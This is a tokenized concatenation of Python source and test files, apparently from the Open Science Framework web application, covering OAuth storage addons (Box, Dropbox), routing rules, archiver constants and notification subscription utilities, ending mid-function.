return self . _logger_class ( <EOL> node = self . owner , <EOL> auth = auth <EOL> ) <EOL> @ property <EOL> def complete ( self ) : <EOL> return bool ( <EOL> self . has_auth and <EOL> self . external_account and <EOL> self . user_settings . verify_oauth_access ( <EOL> node = self . owner , <EOL> external_account = self . external_account , <EOL> ) <EOL> ) <EOL> @ property <EOL> def configured ( self ) : <EOL> return bool ( <EOL> self . complete and <EOL> ( self . folder_id or self . folder_name or self . folder_path ) <EOL> ) <EOL> @ property <EOL> def has_auth ( self ) : <EOL> """<STR_LIT>""" <EOL> return bool ( <EOL> self . user_settings and self . user_settings . has_auth <EOL> ) and bool ( <EOL> self . external_account and self . user_settings . verify_oauth_access ( <EOL> node = self . owner , <EOL> external_account = self . external_account <EOL> ) <EOL> ) <EOL> def clear_settings ( self ) : <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" <EOL> ) <EOL> def set_auth ( self , external_account , user , metadata = None , log = True ) : <EOL> """<STR_LIT>""" <EOL> user_settings = user . get_or_add_addon ( self . oauth_provider . short_name ) <EOL> user_settings . grant_oauth_access ( <EOL> node = self . owner , <EOL> external_account = external_account , <EOL> metadata = metadata <EOL> ) <EOL> user_settings . save ( ) <EOL> self . user_settings = user_settings <EOL> self . external_account = external_account <EOL> if log : <EOL> self . nodelogger . log ( action = "<STR_LIT>" , save = True ) <EOL> self . save ( ) <EOL> def deauthorize ( self , auth = None , add_log = False ) : <EOL> """<STR_LIT>""" <EOL> self . clear_auth ( ) <EOL> def clear_auth ( self ) : <EOL> """<STR_LIT>""" <EOL> self . external_account = None <EOL> self . user_settings = None <EOL> self . save ( ) <EOL> def before_remove_contributor_message ( self , node , removed ) : <EOL> """<STR_LIT>""" <EOL> if self . has_auth and self . user_settings . owner == removed : <EOL> return ( <EOL> u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> ) . format ( <EOL> addon = self . config . full_name , <EOL> category = node . project_or_component , <EOL> name = removed . fullname , <EOL> ) <EOL> before_remove_contributor = before_remove_contributor_message <EOL> def after_remove_contributor ( self , node , removed , auth = None ) : <EOL> """<STR_LIT>""" <EOL> if self . user_settings and self . user_settings . owner == removed : <EOL> self . user_settings . oauth_grants [ self . owner . _id ] . pop ( self . external_account . _id ) <EOL> self . clear_auth ( ) <EOL> message = ( <EOL> u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> ) . format ( <EOL> addon = self . config . full_name , <EOL> category = markupsafe . escape ( node . category_display ) , <EOL> title = markupsafe . escape ( node . title ) , <EOL> user = markupsafe . escape ( removed . fullname ) <EOL> ) <EOL> if not auth or auth . user != removed : <EOL> url = node . web_url_for ( '<STR_LIT>' ) <EOL> message += ( <EOL> u'<STR_LIT>' <EOL> ) . format ( url = url ) <EOL> return message <EOL> def after_fork ( self , node , fork , user , save = True ) : <EOL> """<STR_LIT>""" <EOL> clone , _ = super ( AddonOAuthNodeSettingsBase , self ) . after_fork ( <EOL> node = node , <EOL> fork = fork , <EOL> user = user , <EOL> save = False , <EOL> ) <EOL> if self . has_auth and self . user_settings . owner == user : <EOL> metadata = None <EOL> if self . complete : <EOL> try : <EOL> metadata = self . user_settings . oauth_grants [ node . _id ] [ self . external_account . _id ] <EOL> except ( KeyError , AttributeError ) : <EOL> pass <EOL> clone . set_auth ( self . external_account , user , metadata = metadata , log = False ) <EOL> message = '<STR_LIT>' . format ( <EOL> addon = self . config . full_name , <EOL> category = fork . project_or_component , <EOL> ) <EOL> else : <EOL> message = ( <EOL> u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> ) . format ( <EOL> addon = self . config . full_name , <EOL> url = fork . web_url_for ( '<STR_LIT>' ) , <EOL> category = fork . project_or_component , <EOL> ) <EOL> if save : <EOL> clone . save ( ) <EOL> return clone , message <EOL> def before_register_message ( self , node , user ) : <EOL> """<STR_LIT>""" <EOL> if self . has_auth : <EOL> return ( <EOL> u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> ) . format ( <EOL> addon = self . config . full_name , <EOL> category = node . project_or_component , <EOL> ) <EOL> before_register = before_register_message <EOL> def serialize_waterbutler_credentials ( self ) : <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" <EOL> ) <EOL> def serialize_waterbutler_settings ( self ) : <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" <EOL> ) <EOL> def init_addon ( app , addon_name , routes = True ) : <EOL> """<STR_LIT>""" <EOL> import_path = '<STR_LIT>' . format ( addon_name ) <EOL> addon_module = importlib . import_module ( import_path ) <EOL> data = vars ( addon_module ) <EOL> if routes : <EOL> for route_group in getattr ( addon_module , '<STR_LIT>' , [ ] ) : <EOL> process_rules ( app , ** route_group ) <EOL> return AddonConfig ( <EOL> ** { <EOL> key . lower ( ) : value <EOL> for key , value in data . iteritems ( ) <EOL> } <EOL> ) </s>
<s> import mock <EOL> from contextlib import contextmanager <EOL> from modularodm import storage <EOL> from framework . mongo import set_up_storage <EOL> from website . addons . base . testing import OAuthAddonTestCaseMixin , AddonTestCase <EOL> from website . addons . box import MODELS <EOL> from website . addons . box . model import Box <EOL> from website . addons . box . tests . factories import BoxAccountFactory <EOL> def init_storage ( ) : <EOL> set_up_storage ( MODELS , storage_class = storage . MongoStorage ) <EOL> class BoxAddonTestCase ( OAuthAddonTestCaseMixin , AddonTestCase ) : <EOL> ADDON_SHORT_NAME = '<STR_LIT>' <EOL> ExternalAccountFactory = BoxAccountFactory <EOL> Provider = Box <EOL> def set_node_settings ( self , settings ) : <EOL> super ( BoxAddonTestCase , self ) . set_node_settings ( settings ) <EOL> settings . folder_id = '<STR_LIT>' <EOL> settings . folder_name = '<STR_LIT>' <EOL> mock_responses = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:file>' , '<STR_LIT:id>' : '<STR_LIT>' <EOL> } , <EOL> { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' , '<STR_LIT:id>' : '<STR_LIT>' <EOL> } , <EOL> { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' , '<STR_LIT:id>' : '<STR_LIT>' <EOL> } , <EOL> ] <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:file>' , '<STR_LIT:id>' : '<STR_LIT>' <EOL> } , <EOL> { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' , '<STR_LIT:id>' : '<STR_LIT>' <EOL> } , <EOL> { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' , '<STR_LIT:id>' : '<STR_LIT>' <EOL> } , <EOL> ] <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT:root>' : '<STR_LIT>' , <EOL> '<STR_LIT:size>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False <EOL> } , <EOL> '<STR_LIT>' : { <EOL> "<STR_LIT:size>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:path>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:root>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT:size>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:path>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:root>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> <EOL> } , <EOL> { <EOL> u'<STR_LIT>' : <NUM_LIT:0> , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : True , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:path>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : <NUM_LIT> , <EOL> u'<STR_LIT:root>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:size>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : False <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> <EOL> } , <EOL> '<STR_LIT>' : { <EOL> u'<STR_LIT:id>' : '<STR_LIT:id>' , <EOL> u'<STR_LIT>' : <NUM_LIT> , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : False , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:path>' : '<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : <NUM_LIT:10> , <EOL> u'<STR_LIT:root>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:size>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : False <EOL> } , <EOL> '<STR_LIT>' : [ { u'<STR_LIT>' : <NUM_LIT:0> , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : True , <EOL> u'<STR_LIT>' : False , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:path>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : <NUM_LIT> , <EOL> u'<STR_LIT:root>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:size>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : True } , <EOL> { u'<STR_LIT>' : <NUM_LIT> , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : False , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:path>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : <NUM_LIT> , <EOL> u'<STR_LIT:root>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:size>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : True } ] <EOL> } <EOL> class MockBox ( object ) : <EOL> def put_file ( self , full_path , file_obj , overwrite = False , parent_rev = None ) : <EOL> return mock_responses [ '<STR_LIT>' ] <EOL> def metadata ( self , path , list = True , file_limit = <NUM_LIT> , hash = None , rev = None , <EOL> include_deleted = False ) : <EOL> if list : <EOL> ret = mock_responses [ '<STR_LIT>' ] <EOL> else : <EOL> ret = mock_responses [ '<STR_LIT>' ] <EOL> ret [ '<STR_LIT:path>' ] = path <EOL> return ret <EOL> def get_folder ( * args , ** kwargs ) : <EOL> return mock_responses [ '<STR_LIT>' ] <EOL> def get_file_and_metadata ( * args , ** kwargs ) : <EOL> pass <EOL> def file_delete ( self , path ) : <EOL> return mock_responses [ '<STR_LIT>' ] <EOL> def revisions ( self , path ) : <EOL> ret = mock_responses [ '<STR_LIT>' ] <EOL> for each in ret : <EOL> each [ '<STR_LIT:path>' ] = path <EOL> return ret <EOL> def get_user_info ( self ) : <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> @ contextmanager <EOL> def patch_client ( target , mock_client = None ) : <EOL> """<STR_LIT>""" <EOL> with mock . patch ( target ) as client_getter : <EOL> client = mock_client or MockBox ( ) <EOL> client_getter . return_value = client <EOL> yield client </s>
<s> import mock <EOL> from nose . tools import * <EOL> from tests . base import OsfTestCase <EOL> from website . addons . dropbox . tests . factories import ( <EOL> DropboxUserSettingsFactory , <EOL> DropboxNodeSettingsFactory , <EOL> DropboxAccountFactory <EOL> ) <EOL> from website . addons . dropbox . model import DropboxNodeSettings <EOL> from website . addons . base import testing <EOL> class TestNodeSettings ( testing . models . OAuthAddonNodeSettingsTestSuiteMixin , OsfTestCase ) : <EOL> short_name = '<STR_LIT>' <EOL> full_name = '<STR_LIT>' <EOL> ExternalAccountFactory = DropboxAccountFactory <EOL> NodeSettingsFactory = DropboxNodeSettingsFactory <EOL> NodeSettingsClass = DropboxNodeSettings <EOL> UserSettingsFactory = DropboxUserSettingsFactory <EOL> def _node_settings_class_kwargs ( self , node , user_settings ) : <EOL> return { <EOL> '<STR_LIT>' : self . user_settings , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . node <EOL> } <EOL> def test_folder_defaults_to_none ( self ) : <EOL> node_settings = DropboxNodeSettings ( user_settings = self . user_settings ) <EOL> node_settings . save ( ) <EOL> assert_is_none ( node_settings . folder ) <EOL> @ mock . patch ( <EOL> '<STR_LIT>' , <EOL> mock . PropertyMock ( ) <EOL> ) <EOL> def test_complete_has_auth_not_verified ( self ) : <EOL> super ( TestNodeSettings , self ) . test_complete_has_auth_not_verified ( ) <EOL> class TestUserSettings ( testing . models . OAuthAddonUserSettingTestSuiteMixin , OsfTestCase ) : <EOL> short_name = '<STR_LIT>' <EOL> full_name = '<STR_LIT>' <EOL> ExternalAccountFactory = DropboxAccountFactory </s>
<s> """<STR_LIT>""" <EOL> from nose . tools import * <EOL> from tests . base import OsfTestCase <EOL> from website . addons . forward . tests . factories import ForwardSettingsFactory <EOL> from website . addons . forward import utils <EOL> class TestUtils ( OsfTestCase ) : <EOL> def test_serialize_settings ( self ) : <EOL> node_settings = ForwardSettingsFactory ( ) <EOL> serialized = utils . serialize_settings ( node_settings ) <EOL> assert_equal ( <EOL> serialized , <EOL> { <EOL> '<STR_LIT:url>' : node_settings . url , <EOL> '<STR_LIT:label>' : node_settings . label , <EOL> '<STR_LIT>' : node_settings . redirect_bool , <EOL> '<STR_LIT>' : node_settings . redirect_secs , <EOL> } <EOL> ) <EOL> def test_settings_complete_true ( self ) : <EOL> node_settings = ForwardSettingsFactory ( ) <EOL> assert_true ( utils . settings_complete ( node_settings ) ) <EOL> def test_settings_complete_true_no_redirect ( self ) : <EOL> """<STR_LIT>""" <EOL> node_settings = ForwardSettingsFactory ( redirect_bool = False ) <EOL> assert_true ( utils . settings_complete ( node_settings ) ) <EOL> def test_settings_complete_false ( self ) : <EOL> node_settings = ForwardSettingsFactory ( url = None ) <EOL> assert_false ( utils . settings_complete ( node_settings ) ) </s>
<s> CLIENT_ID = '<STR_LIT>' <EOL> CLIENT_SECRET = '<STR_LIT>' <EOL> REFRESH_TIME = <NUM_LIT:5> * <NUM_LIT> <EOL> OAUTH_SCOPE = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> OAUTH_BASE_URL = '<STR_LIT>' <EOL> API_BASE_URL = '<STR_LIT>' </s>
<s> from framework . routing import Rule , json_renderer <EOL> from website . addons . osfstorage import views <EOL> api_routes = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> Rule ( <EOL> [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' , <EOL> views . osfstorage_get_metadata , <EOL> json_renderer , <EOL> ) , <EOL> Rule ( <EOL> [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' , <EOL> views . osfstorage_delete , <EOL> json_renderer , <EOL> ) , <EOL> Rule ( <EOL> [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' , <EOL> views . osfstorage_download , <EOL> json_renderer , <EOL> ) , <EOL> Rule ( <EOL> [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' , <EOL> views . osfstorage_get_revisions , <EOL> json_renderer , <EOL> ) , <EOL> Rule ( <EOL> [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' , <EOL> views . osfstorage_get_lineage , <EOL> json_renderer , <EOL> ) , <EOL> Rule ( <EOL> [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' , <EOL> views . osfstorage_create_child , <EOL> json_renderer , <EOL> ) , <EOL> Rule ( <EOL> [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' , <EOL> views . osfstorage_get_children , <EOL> json_renderer , <EOL> ) , <EOL> Rule ( <EOL> [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' , <EOL> views . osfstorage_update_metadata , <EOL> json_renderer , <EOL> ) , <EOL> Rule ( <EOL> [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' , <EOL> views . osfstorage_move_hook , <EOL> json_renderer , <EOL> ) , <EOL> Rule ( <EOL> [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' , <EOL> views . osfstorage_copy_hook , <EOL> json_renderer , <EOL> ) , <EOL> Rule ( <EOL> [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' , <EOL> views . osfstorage_add_tag , <EOL> json_renderer <EOL> ) , <EOL> Rule ( <EOL> [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' , <EOL> views . osfstorage_remove_tag , <EOL> json_renderer <EOL> ) , <EOL> ] , <EOL> } </s>
<s> from nose . tools import * <EOL> from tests . base import OsfTestCase <EOL> from tests . factories import AuthUserFactory <EOL> from framework . auth import Auth <EOL> from website . app import init_app <EOL> from website . addons . twofactor . utils import serialize_settings , serialize_urls <EOL> class TestUtils ( OsfTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestUtils , self ) . setUp ( ) <EOL> self . user = AuthUserFactory ( ) <EOL> self . user_addon = self . user . get_or_add_addon ( '<STR_LIT>' ) <EOL> self . user_settings = self . user . get_addon ( '<STR_LIT>' ) <EOL> def test_serialize_urls_enabled ( self ) : <EOL> urls = serialize_urls ( self . user_addon ) <EOL> for key in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> assert_in ( key , urls ) <EOL> assert_equal ( urls [ '<STR_LIT>' ] , self . user_addon . otpauth_url ) <EOL> def test_serialize_urls_disabled ( self ) : <EOL> urls = serialize_urls ( None ) <EOL> for key in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> assert_in ( key , urls ) <EOL> assert_equal ( urls [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_serialize_settings_enabled_and_unconfirmed ( self ) : <EOL> settings = serialize_settings ( Auth ( self . user ) ) <EOL> assert_true ( settings [ '<STR_LIT>' ] ) <EOL> assert_false ( settings [ '<STR_LIT>' ] ) <EOL> assert_equal ( settings [ '<STR_LIT>' ] , self . user_addon . totp_secret_b32 ) <EOL> assert_equal ( settings [ '<STR_LIT>' ] , self . user_addon . totp_drift ) <EOL> def test_serialize_settings_enabled_and_confirmed ( self ) : <EOL> self . user_addon . is_confirmed = True <EOL> self . user_addon . save ( ) <EOL> settings = serialize_settings ( Auth ( self . user ) ) <EOL> assert_true ( settings [ '<STR_LIT>' ] ) <EOL> assert_true ( settings [ '<STR_LIT>' ] ) <EOL> assert_equal ( settings [ '<STR_LIT>' ] , self . user_addon . totp_secret_b32 ) <EOL> assert_equal ( settings [ '<STR_LIT>' ] , self . user_addon . totp_drift ) <EOL> def test_serialize_settings_disabled ( self ) : <EOL> user = AuthUserFactory ( ) <EOL> settings = serialize_settings ( Auth ( user ) ) <EOL> assert_false ( settings [ '<STR_LIT>' ] ) <EOL> assert_false ( settings [ '<STR_LIT>' ] ) <EOL> assert_equal ( settings [ '<STR_LIT>' ] , None ) <EOL> assert_equal ( settings [ '<STR_LIT>' ] , None ) </s>
<s> ARCHIVER_INITIATED = '<STR_LIT>' <EOL> ARCHIVER_FAILURE = '<STR_LIT>' <EOL> ARCHIVER_SUCCESS = '<STR_LIT>' <EOL> ARCHIVER_SENT = '<STR_LIT>' <EOL> ARCHIVER_PENDING = '<STR_LIT>' <EOL> ARCHIVER_CHECKING = '<STR_LIT>' <EOL> ARCHIVER_SENDING = '<STR_LIT>' <EOL> ARCHIVER_NETWORK_ERROR = '<STR_LIT>' <EOL> ARCHIVER_SIZE_EXCEEDED = '<STR_LIT>' <EOL> ARCHIVER_FILE_NOT_FOUND = '<STR_LIT>' <EOL> ARCHIVER_UNCAUGHT_ERROR = '<STR_LIT>' <EOL> ARCHIVER_FAILURE_STATUSES = { <EOL> ARCHIVER_FAILURE , <EOL> ARCHIVER_NETWORK_ERROR , <EOL> ARCHIVER_SIZE_EXCEEDED , <EOL> ARCHIVER_FILE_NOT_FOUND , <EOL> ARCHIVER_UNCAUGHT_ERROR , <EOL> } <EOL> NO_ARCHIVE_LIMIT = '<STR_LIT>' <EOL> class StatResult ( object ) : <EOL> """<STR_LIT>""" <EOL> num_files = <NUM_LIT:1> <EOL> def __init__ ( self , target_id , target_name , disk_usage = <NUM_LIT:0> ) : <EOL> self . target_id = target_id <EOL> self . target_name = target_name <EOL> self . disk_usage = float ( disk_usage ) <EOL> def __str__ ( self ) : <EOL> return str ( self . _to_dict ( ) ) <EOL> def _to_dict ( self ) : <EOL> return { <EOL> '<STR_LIT>' : self . target_id , <EOL> '<STR_LIT>' : self . target_name , <EOL> '<STR_LIT>' : self . disk_usage , <EOL> } <EOL> class AggregateStatResult ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , target_id , target_name , targets = None ) : <EOL> self . target_id = target_id <EOL> self . target_name = target_name <EOL> self . targets = [ target for target in targets if target ] <EOL> def __str__ ( self ) : <EOL> return str ( self . _to_dict ( ) ) <EOL> def _to_dict ( self ) : <EOL> return { <EOL> '<STR_LIT>' : self . target_id , <EOL> '<STR_LIT>' : self . target_name , <EOL> '<STR_LIT>' : [ <EOL> target . _to_dict ( ) <EOL> for target in self . targets <EOL> ] , <EOL> '<STR_LIT>' : self . num_files , <EOL> '<STR_LIT>' : self . disk_usage , <EOL> } <EOL> @ property <EOL> def num_files ( self ) : <EOL> return sum ( [ value . num_files for value in self . targets ] ) <EOL> @ property <EOL> def disk_usage ( self ) : <EOL> return sum ( [ value . disk_usage for value in self . targets ] ) </s>
<s> from website . files . models . base import File , Folder , FileNode <EOL> __all__ = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class GithubFileNode ( FileNode ) : <EOL> provider = '<STR_LIT>' <EOL> class GithubFolder ( GithubFileNode , Folder ) : <EOL> pass <EOL> class GithubFile ( GithubFileNode , File ) : <EOL> version_identifier = '<STR_LIT>' <EOL> def touch ( self , auth_header , revision = None , ref = None , branch = None , ** kwargs ) : <EOL> revision = revision or ref or branch <EOL> return super ( GithubFile , self ) . touch ( auth_header , revision = revision , ** kwargs ) </s>
<s> import collections <EOL> from modularodm import Q <EOL> from modularodm . exceptions import NoResultsFound <EOL> from framework . auth import signals <EOL> from website . models import Node , User <EOL> from website . notifications import constants <EOL> from website . notifications import model <EOL> from website . notifications . model import NotificationSubscription <EOL> class NotificationsDict ( dict ) : <EOL> def __init__ ( self ) : <EOL> super ( NotificationsDict , self ) . __init__ ( ) <EOL> self . update ( messages = [ ] , children = collections . defaultdict ( NotificationsDict ) ) <EOL> def add_message ( self , keys , messages ) : <EOL> """<STR_LIT>""" <EOL> d_to_use = self <EOL> for key in keys : <EOL> d_to_use = d_to_use [ '<STR_LIT>' ] [ key ] <EOL> if not isinstance ( messages , list ) : <EOL> messages = [ messages ] <EOL> d_to_use [ '<STR_LIT>' ] . extend ( messages ) <EOL> def find_subscription_type ( subscription ) : <EOL> """<STR_LIT>""" <EOL> subs_available = list ( constants . USER_SUBSCRIPTIONS_AVAILABLE . keys ( ) ) <EOL> subs_available . extend ( list ( constants . NODE_SUBSCRIPTIONS_AVAILABLE . keys ( ) ) ) <EOL> for available in subs_available : <EOL> if available in subscription : <EOL> return available <EOL> def to_subscription_key ( uid , event ) : <EOL> """<STR_LIT>""" <EOL> return u'<STR_LIT>' . format ( uid , event ) <EOL> def from_subscription_key ( key ) : <EOL> parsed_key = key . split ( "<STR_LIT:_>" , <NUM_LIT:1> ) <EOL> return { <EOL> '<STR_LIT>' : parsed_key [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : parsed_key [ <NUM_LIT:1> ] <EOL> } <EOL> @ signals . contributor_removed . connect <EOL> def remove_contributor_from_subscriptions ( contributor , node ) : <EOL> """<STR_LIT>""" <EOL> if contributor . _id not in node . admin_contributor_ids : <EOL> node_subscriptions = get_all_node_subscriptions ( contributor , node ) <EOL> for subscription in node_subscriptions : <EOL> subscription . remove_user_from_subscription ( contributor ) <EOL> @ signals . node_deleted . connect <EOL> def remove_subscription ( node ) : <EOL> model . NotificationSubscription . remove ( Q ( '<STR_LIT>' , '<STR_LIT>' , node ) ) <EOL> parent = node . parent_node <EOL> if parent and parent . child_node_subscriptions : <EOL> for user_id in parent . child_node_subscriptions : <EOL> if node . _id in parent . child_node_subscriptions [ user_id ] : <EOL> parent . child_node_subscriptions [ user_id ] . remove ( node . _id ) <EOL> parent . save ( ) <EOL> def separate_users ( node , user_ids ) : <EOL> """<STR_LIT>""" <EOL> removed = [ ] <EOL> subbed = [ ] <EOL> for user_id in user_ids : <EOL> try : <EOL> user = User . load ( user_id ) <EOL> except TypeError : <EOL> user = user_id <EOL> if node . has_permission ( user , '<STR_LIT>' ) : <EOL> subbed . append ( user_id ) <EOL> else : <EOL> removed . append ( user_id ) <EOL> return subbed , removed <EOL> def users_to_remove ( source_event , source_node , new_node ) : <EOL> """<STR_LIT>""" <EOL> removed_users = { key : [ ] for key in constants . NOTIFICATION_TYPES } <EOL> if source_node == new_node : <EOL> return removed_users <EOL> old_sub = NotificationSubscription . load ( to_subscription_key ( source_node . _id , source_event ) ) <EOL> old_node_sub = NotificationSubscription . load ( to_subscription_key ( source_node . _id , <EOL> '<STR_LIT:_>' . join ( source_event . split ( '<STR_LIT:_>' ) [ - <NUM_LIT:2> : ] ) ) ) <EOL> if not old_sub and not old_node_sub : <EOL> return removed_users <EOL> for notification_type in constants . NOTIFICATION_TYPES : <EOL> users = getattr ( old_sub , notification_type , [ ] ) + getattr ( old_node_sub , notification_type , [ ] ) <EOL> subbed , removed_users [ notification_type ] = separate_users ( new_node , users ) <EOL> return removed_users <EOL> def move_subscription ( remove_users , source_event , source_node , new_event , new_node ) : <EOL> """<STR_LIT>""" <EOL> if source_node == new_node : <EOL> return <EOL> old_sub = NotificationSubscription . load ( to_subscription_key ( source_node . _id , source_event ) ) <EOL> if not old_sub : <EOL> return <EOL> elif old_sub : <EOL> old_sub . update_fields ( _id = to_subscription_key ( new_node . _id , new_event ) , event_name = new_event , <EOL> owner = new_node ) <EOL> new_sub = old_sub <EOL> for notification_type in constants . NOTIFICATION_TYPES : <EOL> if new_sub : <EOL> for user_id in remove_users [ notification_type ] : <EOL> if user_id in getattr ( new_sub , notification_type , [ ] ) : <EOL> user = User . load ( user_id ) <EOL> new_sub . remove_user_from_subscription ( user ) <EOL> def get_configured_projects ( user ) : <EOL> """<STR_LIT>""" <EOL> configured_project_ids = set ( ) <EOL> user_subscriptions = get_all_user_subscriptions ( user ) <EOL> for subscription in user_subscriptions : <EOL> if subscription is None : <EOL> continue <EOL> node = subscription . owner <EOL> if not isinstance ( node , Node ) or ( user in subscription . none and not node . parent_id ) : <EOL> continue <EOL> while node . parent_id and not node . is_deleted : <EOL> node = Node . load ( node . parent_id ) <EOL> if not node . is_deleted : <EOL> configured_project_ids . add ( node . _id ) <EOL> return list ( configured_project_ids ) <EOL> def check_project_subscriptions_are_all_none ( user , node ) : <EOL> node_subscriptions = get_all_node_subscriptions ( user , node ) <EOL> for s in node_subscriptions : <EOL> if user not in s . none : <EOL> return False <EOL> return True <EOL> def get_all_user_subscriptions ( user ) : <EOL> """<STR_LIT>""" <EOL> for notification_type in constants . NOTIFICATION_TYPES : <EOL> query = NotificationSubscription . find ( Q ( notification_type , '<STR_LIT>' , user . _id ) ) <EOL> for subscription in 